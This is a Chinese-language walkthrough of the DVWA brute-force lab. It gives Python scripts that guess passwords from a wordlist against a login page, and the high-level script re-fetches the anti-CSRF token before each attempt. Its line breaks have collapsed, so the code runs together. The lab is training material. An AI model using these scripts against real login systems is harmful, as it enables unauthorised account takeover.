low
遍历字典(成功的前提是字典里有这个密码)
import requests
import redef main():url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'headers = {'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=low'}h = open('pwd.txt')line = h.readline()while line:password = line.strip()new_url = url + '?username=admin&password=' + password + '&Login=Login'res = requests.get(new_url, headers=headers)if 'Username and/or password incorrect.' in res.content:print('Test %s: No' % password)else:print('Test %s: Yes' % password)breakline = h.readline()if __name__ == '__main__':main()结果
Test 123456: No
Test admin: No
Test password: Yes
[Finished in 0.3s]medium
查看源码发现
sleep( 2 ); 测试不成功时会延时2s,方法和low一样,只是慢一些,需要更新cookie中的安全等级security。
headers = {'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=medium'
}high
查看源码发现
<input type="hidden" name="user_token" value="2fe55c6b0091776e6f46283d41854b41">// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 多一个字段,测试后可发现user_token字段的值是动态的,思路即是在代码层面动态获该字段的值,再发测试密码的请求。
import requests
import redef main():url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'headers = {'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=high'}h = open('pwd.txt')line = h.readline()while line:password = line.strip()res = requests.get(url, headers=headers)m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)if m:user_token = m.group(1)new_url = url + '?username=admin&password=' + password + '&user_token=' + user_token + '&Login=Login'res = requests.get(new_url, headers=headers)if 'Username and/or password incorrect.' in res.content:print('Test %s: No' % password)else:print('Test %s: Yes' % password)breakline = h.readline()if __name__ == '__main__':main()